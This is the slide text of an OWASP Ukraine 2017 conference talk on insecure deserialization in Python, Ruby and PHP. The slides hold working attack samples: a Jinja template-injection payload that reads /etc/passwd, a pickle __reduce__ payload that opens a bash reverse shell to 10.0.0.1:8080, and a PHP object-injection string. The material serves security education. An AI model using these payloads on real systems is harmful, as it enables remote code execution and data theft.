Vlada Kulish shared us really technical topic about Deserialization or how one small object can break all your security. OWASP Ukraine 2017 Security Conference https://www.facebook.com/events/914991308665427/

2. Security Engineer
OWASP Lviv member
Vlada Kulish

4. Deserialize
Serialize

7. 2% 6%
8%
62%
4%
2%
2%
14%
Bypass
DoS
DoS Exec Code
Exec Code
Exec Code Bypass
Exec Code CSRF
Priv
unspesified

8. .Net
6%
Java
63%
JavaScript
4%
Jython
2%
php
11%
Python
2%
Ruby
2% XML
2%
YAML
8%

9. http://address/injectedData Server Template
{{5*5}} {{5*5}}
25

10. @app.errorhandler(404)
def page_not_found(e):
template = '''{%% extends "layout.html" %%}
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>%s</h3>
</div>
{%% endblock %%}
''' % (request.url)
return render_template_string(template), 404
{%% block body %%}
<div class="center-content error">
<h1>Oops! That page doesn't exist.</h1>
<h3>aaa{{5*5}}</h3>
</div>
{%% endblock %%}

11. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}

12. {{‘ ‘.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
<type 'str'>, <type 'basestring'>, <type 'object'>.__class__.__mro__
[<type 'type'>, <type 'weakref'>, …, <type 'file'>, <type 'PyCapsule'>….].__subclasses__()

13. type
class
object
subclas
s
type
params

14. Pickle
Protocol v.0 – ACSII
Protocol v.1 – Old binary format
Protocol v.2 – New binary format

15. Instructure
engine
Stack Memo

17. Old <Legitimate pickle>
New <Inserted shellcode>
Result Result of inserted shellcode, likely an error

18. Old <Legitimate pickle>
New <Shellcode and some empty stack><Legitimate pickle>
Result Original object

19. Old <Legitimate pickle>…S’<html><h1>AAA…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><h1>Surprise!…’n
<Legitimate pickle>
Result Identically-typed object to original with altered attribute value

20. Old <Legitimate pickle>…S’<html><body>Foo…’n
<Legitimate pickle>
New <Legitimate pickle>…S’<html><body>
<Instruction returning string>…’n
<Legitimate pickle>
Result Identically-typed object to original with new attribute value
assigned by executed instructions

23. import pickle
import socket
import os
class payload(object):
def __reduce__(self):
comm = "bash -i >& /dev/tcp/10.0.0.1/8080 0>&1"
return (os.system, (comm,))
payload = pickle.dumps( payload())

24. • http://media.blackhat.com/bh-us-
11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
• https://exploit-exercises.com/nebula/level17/
• https://blog.nelhage.com/2011/03/exploiting-pickle/

28. CVE-2013-0156 Ruby on Rails XML processor YAML deserialization
code execution
Unsafe Object Deserialization Vulnerability in
RubyGems
CVE-2017-0903

29. Ruby on Rails (<4.1 by default) used Marshal.load() on user cookies
<div class="content">
<%= hidden_field_tag 'user', Base64.encode64(Marshal.dump(@user)) %>
…
</div>

30. http://blog.rubygems.org/2017/10/09/unsafe-object-deserialization-vulnerability.html
https://blog.rapid7.com/2013/01/09/serialization-mischief-in-ruby-land-cve-2013-
0156/
http://blog.codeclimate.com/blog/2013/01/10/rails-remote-code-execution-
vulnerability-explained/
https://www.sitepoint.com/anatomy-of-an-exploit-an-in-depth-look-at-the-rails-yaml-
vulnerability/
https://github.com/OWASP/railsgoat/wiki/Extras:-Remote-Code-Execution

31. __destruct()
__wakeup()

32. if (isset ($_COOKIE['leet_hax0r'])) {
$sess_data = unserialize (base64_decode
($_COOKIE['leet_hax0r']));
…}
a:2:{s:2:"ip";s:15:“IP_addr";i:1;O:3:"SQL":2:{s:5:"query";s:38:"SELE
CT password AS username FROM users";s:4:"conn";N;}}

33. CVE-2015-8562: Joomla Remote Code Execution
CVE-2015-7808: vBulletin 5 Unserialize Code Execution
CVE-2015-2171: Slim Framework PHP Object Injection

34. https://www.owasp.org/index.php/PHP_Object_Injection
https://www.tarlogic.com/en/blog/how-php-object-injection-works-php-
object-injection/
https://pagely.com/blog/2017/05/php-object-injection-insecure-
unserialize-wordpress